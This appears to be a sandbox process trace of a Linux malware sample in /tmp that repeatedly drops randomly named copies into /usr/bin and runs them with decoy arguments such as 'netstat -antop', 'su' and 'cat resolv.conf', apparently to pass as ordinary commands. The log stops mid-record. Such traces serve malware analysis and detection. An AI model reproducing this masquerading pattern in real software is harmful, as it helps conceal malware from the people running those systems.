                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:/usr/bin/hgfzmygnbx "cat resolv.conf" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:/usr/bin/hgfzmygnbx top 9452
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:/usr/bin/hgfzmygnbx sh 9452
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:/usr/bin/hgfzmygnbx uptime 9452
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:/usr/bin/hgfzmygnbx "cat resolv.conf" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:36
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hgfzmygnbx
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:872880f6f7422435ae6d1eaefe04a5a4

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:/usr/bin/lnmgbribvb pwd 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:/usr/bin/lnmgbribvb bash 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:/usr/bin/lnmgbribvb top 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:/usr/bin/lnmgbribvb id 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:/usr/bin/lnmgbribvb su 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:42
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lnmgbribvb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a2eda8f3694ef7eb8b04888e5ed38a24

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:/usr/bin/wdcujvrbpo uptime 9452
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:/usr/bin/wdcujvrbpo "ps -ef" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:/usr/bin/wdcujvrbpo "cd /etc" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:47
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:48
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:48
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:48
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:/usr/bin/wdcujvrbpo uptime 9452
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:48
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:48
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:48
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:48
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:/usr/bin/wdcujvrbpo top 9452
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:48
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wdcujvrbpo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:635da966c3034a8039505f87e4bd322d

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:/usr/bin/zbksjhrfms "netstat -antop" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:/usr/bin/zbksjhrfms "echo \"find\"" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:/usr/bin/zbksjhrfms top 9452
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:/usr/bin/zbksjhrfms bash 9452
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:/usr/bin/zbksjhrfms "cat resolv.conf" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:53
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/zbksjhrfms
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:882c9b8e9ce35602db8fa3bc5ada4cc0

                                                        Start time:19:53:58
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:58
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:58
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:/usr/bin/eoqlmyvucn "netstat -antop" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:53:58
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:/usr/bin/eoqlmyvucn "netstat -an" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:/usr/bin/eoqlmyvucn top 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:/usr/bin/eoqlmyvucn "cd /etc" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:/usr/bin/eoqlmyvucn "ls -la" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:53:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eoqlmyvucn
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7421c1f0ece93b4321a3809440512935

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:/usr/bin/wzhmvohlxs uptime 9452
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:/usr/bin/wzhmvohlxs "netstat -antop" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:/usr/bin/wzhmvohlxs ifconfig 9452
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:/usr/bin/wzhmvohlxs ifconfig 9452
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:05
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:05
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:05
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:/usr/bin/wzhmvohlxs "ifconfig eth0" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:05
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/wzhmvohlxs
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:8816cee3c946563644ff93e94d5ffa35

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
                                                        Arguments:/usr/bin/hiueshutol "sleep 1" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
